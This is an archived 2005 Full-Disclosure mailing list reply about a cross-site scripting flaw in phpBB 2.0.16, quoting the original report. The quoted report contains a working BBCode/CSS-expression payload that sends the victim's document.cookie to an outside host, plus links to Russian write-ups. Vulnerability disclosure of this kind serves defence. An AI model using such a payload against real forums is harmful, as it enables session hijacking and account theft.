[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] XSS in nested tag in phpbb 2.0.16

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] XSS in nested tag in phpbb 2.0.16
From: Aaron Horst <anthrax101@xxxxxxxxx>
Date: Tue, 5 Jul 2005 16:48:50 -0400

Please forgive my redundant report, below. I forgot to flush my cached
copy of the FD list.

AnthraX101

On 7/5/05, alex <pigrelax@xxxxxxxxx> wrote:
> Hi all!
> 
> Example:
> 
> [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'styl
> e='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antic
> hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/u
> rl][/url]'[/color]
> 
> More info:
> http://www.securitylab.ru/55612.html
> 
> and
> 
> http://antichat.ru/txt/phpbb/
> 
> (In Russian)
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 


-- 
AnthraX101 -- PGP Key ID# 0x4CD6D0BD
Fingerprint:
8161 D008 3DAB 86C1 2CA3  AEDE 0E21 DBDE 4CD6 D0BD
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] XSS in nested tag in phpbb 2.0.16
  - From: alex

Prev by Date: [Full-disclosure] Unpatched phpBB XSS [in 2.0.16]
Next by Date: RE: [Full-disclosure] Solaris 9/10 ld.so fun
Previous by thread: [Full-disclosure] XSS in nested tag in phpbb 2.0.16
Next by thread: [Full-disclosure] Re: XSS in nested tag in phpbb 2.0.16
Index(es):
- Date
- Thread